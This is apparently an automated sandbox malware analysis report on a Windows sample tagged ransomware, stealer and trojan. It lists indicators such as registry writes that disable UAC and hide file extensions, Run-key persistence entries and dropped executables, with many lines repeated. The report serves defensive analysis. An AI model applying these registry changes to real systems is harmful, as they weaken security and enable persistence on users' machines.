Malware Analysis Report

2025-01-22 20:18

Sample ID 241020-c569lsthmc
Target 7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN
SHA256 7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591b
Tags
discovery evasion persistence ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591b

Threat Level: Known bad

The file 7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN was found to be: Known bad.

Malicious Activity Summary

discovery evasion persistence ransomware spyware stealer trojan

Modifies visibility of file extensions in Explorer

UAC bypass

Renames multiple (76) files with added filename extension

Renames multiple (52) files with added filename extension

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Adds Run key to start application

Drops file in System32 directory

System Location Discovery: System Language Discovery

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Modifies registry key

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-20 02:40

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-20 02:40

Reported

2024-10-20 02:42

Platform

win7-20240903-en

Max time kernel

120s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Renames multiple (76) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Control Panel\International\Geo\Nation C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe N/A
N/A N/A C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
N/A N/A C:\ProgramData\ogogoYAQ\pSoMwskA.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\YigQsUoE.exe = "C:\\ProgramData\\KcEsUAsg\\YigQsUoE.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\KGAQwQEs.exe = "C:\\Users\\Admin\\mkcUkYkA\\KGAQwQEs.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DGQIEEQU.exe = "C:\\ProgramData\\YKcAIoYs\\DGQIEEQU.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\KGAQwQEs.exe = "C:\\Users\\Admin\\mkcUkYkA\\KGAQwQEs.exe" C:\Users\Admin\mkcUkYkA\KGAQwQEs.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DGQIEEQU.exe = "C:\\ProgramData\\YKcAIoYs\\DGQIEEQU.exe" C:\ProgramData\YKcAIoYs\DGQIEEQU.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DGQIEEQU.exe = "C:\\ProgramData\\YKcAIoYs\\DGQIEEQU.exe" C:\ProgramData\ogogoYAQ\pSoMwskA.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\wogYwAcY.exe = "C:\\Users\\Admin\\bsgUEsgQ\\wogYwAcY.exe" C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\mkcUkYkA C:\ProgramData\ogogoYAQ\pSoMwskA.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\mkcUkYkA\KGAQwQEs C:\ProgramData\ogogoYAQ\pSoMwskA.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
